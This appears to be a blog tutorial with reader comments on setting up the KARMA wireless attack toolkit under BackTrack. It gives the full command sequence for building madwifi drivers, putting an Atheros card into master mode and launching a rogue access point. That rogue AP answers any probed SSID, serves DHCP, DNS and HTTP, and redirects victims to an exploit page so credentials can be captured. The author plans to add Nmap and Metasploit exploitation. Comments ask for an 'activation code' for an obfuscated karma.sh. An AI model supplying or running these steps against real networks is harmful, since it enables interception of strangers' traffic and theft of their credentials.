THIS WORKS WITH ATHEROS BASED CHIPSET ONLY.
Project homepage: http://theta44.org/karma/index.html
“KARMA is a set of tools for assessing the security of wireless clients at multiple layers. Wireless sniffing tools discover clients and their preferred/trusted networks by passively listening for 802.11 Probe Request frames. From there, individual clients can be targeted by creating a Rogue AP for one of their probed networks (which they may join automatically) or using a custom driver that responds to probes and association requests for any SSID. Higher-level fake services can then capture credentials or exploit client-side vulnerabilities on the host.” -http://theta44.org
first of all install the latest madwifi snapshots here
http://snapshots.madwifi.org/madwifi-trunk/madwifi-trunk-r3813-20080720.tar.gz
bt ~#tar -zxvf madwifi-trunk-r3813-20080720.tar.gz
bt ~#cd madwifi-trunk-r3813-20080720
bt ~#make && make install
bt ~ # ln -s /sbin/iwconfig /usr/sbin/iwconfig
bt ~# ln -s /sbin/iwpriv /usr/sbin/iwpriv
bt ~# ln -s /sbin/iwevent /usr/sbin/iwevent
bt ~# airmon-ng start ath0
bt ~#airmon-ng start wifi0
Putting the card into monitor mode
bt ~#wlanconfig ath0 destroy
bt ~#wlanconfig ath0 create wlandev wifi0 wlanmode master
goto karma directory
karma.xml – “Runs a rogue base station with DHCP, DNS and HTTP services. The HTTP service re-directs all requests to the ExampleWebExploit module that displays a simple HTML page. This page can be replaced with something that informs the user that their wireless settings are insecure and that it may be a violation of corporate policy etc” -http://theta44.org
bt karma#bin/monitor-mode.sh ath0
bt karma#(cd ./src/ && make) && ./src/karma ath0
bt karma#
bt karma#bin/karma etc/karma.xml
Now the rogue services are started any probing clients will now connect to KARMA on our machine whichever SSID their machine chooses to use.
Iwconfig output showing ath0 working as RogueAP.we can see bssid of RogueAP
We can see our FakeAP is working now and broadcasting BSSID & other clients probing for legitimate AP automatically connects with our rogueAP
karma-scan.xml – “Attempts to find insecure wireless clients that will associate to rouge network and possibly obtain IP address via DHCP”. -http://theta44.org
bt karma#bin/karma etc/karma-scan.xml
karma.scan.xml
This tool have layer attack approach.I am still working on it so that we can lauch more attack like Nmap scanning and metasploit for exploit the known vulnerabilites.
Quick question. Do most Wi-Fi pentesting tools work with
the USB type of adapters?
Thanks,
Ray
You can OPT for Alfa & Edimax,Linksys WUSb54GC type cards which are USB Dongles & supports injection well right out of the box.for more info search backtrack HCL Wiki
Hi I need the code for karma.sh please thanks
karma.sh itself is shell source code file.check it out using vi or nano or kwrite
Hi yes it is a shell but it ask’s for a activation code that it send’s to your email but I can not find where to change the default email to my one thanks
hi where can i download karma.sh and how do i get the activation code or how do i set it all up many thanks
Hi got karma.sh opened it up with kwhigt and it is not english some kind of computer encrypt please can some one help me try and read it please
Plz give me the activation code for karma.sh…………!!!!!!!Thnx
Hi I need the code for karma.sh please
Could you please give me the all details.Because i’m new to BT.
can’t download ..need help